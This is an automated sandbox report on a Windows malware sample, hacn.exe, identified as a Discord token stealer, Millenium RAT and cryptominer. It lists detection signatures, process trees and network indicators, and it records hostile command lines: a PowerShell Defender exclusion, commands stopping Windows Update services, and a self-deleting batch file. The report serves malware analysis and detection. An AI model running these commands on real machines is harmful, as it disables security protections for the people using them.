Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hacn.exe

Overview

General Information

Sample name:hacn.exe
Analysis ID:1401452
MD5:98ae932a21fee19c4b51ffa7abd4cec1
SHA1:e4db77c1248591ba12160223e028004ffd3366d3
SHA256:d0c18b8e222e3b9c09c05145bab139b63e010ba754f4ff688ee71ac69697a402
Tags:exe
Infos:

Detection

Discord Token Stealer, Millenuim RAT, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Snort IDS alert for network traffic
Yara detected Discord Token Stealer
Yara detected Millenuim RAT
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to capture screen (.Net source)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Contains functionality to log keystrokes (.Net Source)
Creates a thread in another existing process (thread injection)
Found hidden mapped module (file has been removed from disk)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • hacn.exe (PID: 7572 cmdline: C:\Users\user\Desktop\hacn.exe MD5: 98AE932A21FEE19C4B51FFA7ABD4CEC1)
    • hacn.exe (PID: 7588 cmdline: C:\Users\user\Desktop\hacn.exe MD5: 98AE932A21FEE19C4B51FFA7ABD4CEC1)
      • cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • s.exe (PID: 7688 cmdline: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe -pbeznogym MD5: 232B5DBB1510598F8A683DD2752A99C4)
          • main.exe (PID: 7748 cmdline: "C:\ProgramData\main.exe" MD5: DE8515E07D1C34FFF3C1DDD4FEE593FB)
            • cmd.exe (PID: 7708 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp1E4E.tmp.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 7308 cmdline: Tasklist /fi "PID eq 7748" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 7332 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
              • timeout.exe (PID: 7884 cmdline: Timeout /T 1 /Nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • tasklist.exe (PID: 8136 cmdline: Tasklist /fi "PID eq 7748" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 8152 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
              • timeout.exe (PID: 8092 cmdline: Timeout /T 1 /Nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • tasklist.exe (PID: 7792 cmdline: Tasklist /fi "PID eq 7748" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 8064 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
              • timeout.exe (PID: 7384 cmdline: Timeout /T 1 /Nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
          • setup.exe (PID: 7768 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)
            • dialer.exe (PID: 6832 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
              • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
              • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
              • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
              • dwm.exe (PID: 988 cmdline: dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
  • powershell.exe (PID: 7792 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8064 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8112 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8128 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8144 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8160 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8176 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • updater.exe (PID: 1436 cmdline: C:\Program Files\Google\Chrome\updater.exe MD5: 1274CBCD6329098F79A3BE6D76AB8B97)
    • dialer.exe (PID: 8096 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 2784 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 1508 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • Conhost.exe (PID: 3912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 984 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7876 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7816 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7840 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8076 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8112 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 8176 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
      C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
        C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJoeSecurity_MillenuimRATYara detected Millenuim RATJoe Security
          C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 9 entries
              SourceRuleDescriptionAuthorStrings
              00000035.00000002.2890430367.0000014A059CF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
                    00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MillenuimRATYara detected Millenuim RATJoe Security
                      00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                        Click to see the 11 entries
                        SourceRuleDescriptionAuthorStrings
                        5.0.main.exe.244178405b8.1.raw.unpackJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
                          5.0.main.exe.244178405b8.1.raw.unpackJoeSecurity_MillenuimRATYara detected Millenuim RATJoe Security
                            5.0.main.exe.244178405b8.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                              5.0.main.exe.244178405b8.1.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                                5.0.main.exe.244176d0000.0.unpackJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
                                  Click to see the 19 entries

                                  Operating System Destruction

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 8064, ProcessName: cmd.exe

                                  System Summary

                                  barindex
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7792, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7792, ProcessName: powershell.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 6832, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7792, ProcessName: powershell.exe
                                  Timestamp:03/01/24-15:22:10.789667
                                  SID:2036289
                                  Source Port:63417
                                  Destination Port:53
                                  Protocol:UDP
                                  Classtype:A Network Trojan was detected

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpAvira: detection malicious, Label: RKIT/Agent.diumn
                                  Source: C:\ProgramData\main.exeReversingLabs: Detection: 65%
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeReversingLabs: Detection: 20%
                                  Source: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpReversingLabs: Detection: 91%
                                  Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeReversingLabs: Detection: 65%
                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmpReversingLabs: Detection: 55%
                                  Source: hacn.exeReversingLabs: Detection: 47%
                                  Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\main.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\setup.exeJoe Sandbox ML: detected
                                  Source: hacn.exeJoe Sandbox ML: detected
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CB9020 CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,CryptDestroyHash,5_2_00007FFDF7CB9020
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CB8FE0 CryptReleaseContext,5_2_00007FFDF7CB8FE0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CB8DC0 CryptAcquireContextW,GetLastError,CryptReleaseContext,CryptReleaseContext,CryptReleaseContext,5_2_00007FFDF7CB8DC0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CF0B50 GetCurrentProcessId,GetEnvironmentVariableA,lstrlenA,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,wsprintfA,GetEnvironmentVariableA,lstrlenA,lstrcatA,lstrcatA,lstrcmpA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,5_2_00007FFDF7CF0B50

                                  Bitcoin Miner

                                  barindex
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: Yara matchFile source: 49.2.dialer.exe.21cc15ed520.3.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 49.2.dialer.exe.21cc15ed520.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 49.2.dialer.exe.21cc15e9c40.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000035.00000002.2890430367.0000014A059CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000031.00000002.2888080335.0000021CC15E7000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPED
                                  Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49733 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49749 version: TLS 1.2
                                  Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49759 version: TLS 1.2
                                  Source: hacn.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: s.exe, 00000004.00000000.1661323675.0000000000113000.00000002.00000001.01000000.00000006.sdmp, s.exe, 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000000.00000003.1643673285.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1667598318.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp
                                  Source: Binary string: C:\Users\attat\source\repos\Millenium RAT Buillder V2.8\Millenium\Millenium\obj\Release\net462\conhost.pdb source: main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, main.exe, 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: costura.costura.pdb.compressed source: main.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000001.00000002.1666681967.00007FFDFB78F000.00000002.00000001.01000000.00000004.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 00000004.00000003.1670923663.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000002.1756028190.0000024419AB2000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D337F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF61D337F4C
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D337F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF61D337F4C
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D341FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF61D341FE4
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D328B00 FindFirstFileExW,FindClose,0_2_00007FF61D328B00
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,4_2_000EA69B
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,4_2_000FC220
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CB1DB0 FindFirstFileExA,5_2_00007FFDF7CB1DB0
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC64DCE0 FindFirstFileExW,22_2_00000225DC64DCE0
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC6ADCE0 FindFirstFileExW,22_2_00000225DC6ADCE0
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AEDCE0 FindFirstFileExW,26_2_00000202C0AEDCE0
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A66130DCE0 FindFirstFileExW,29_2_000002A66130DCE0
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF02DCE0 FindFirstFileExW,30_2_000002BAAF02DCE0
                                  Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000026A879CDCE0 FindFirstFileExW,51_2_0000026A879CDCE0

                                  Networking

                                  barindex
                                  Source: TrafficSnort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.4:63417 -> 1.1.1.1:53
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
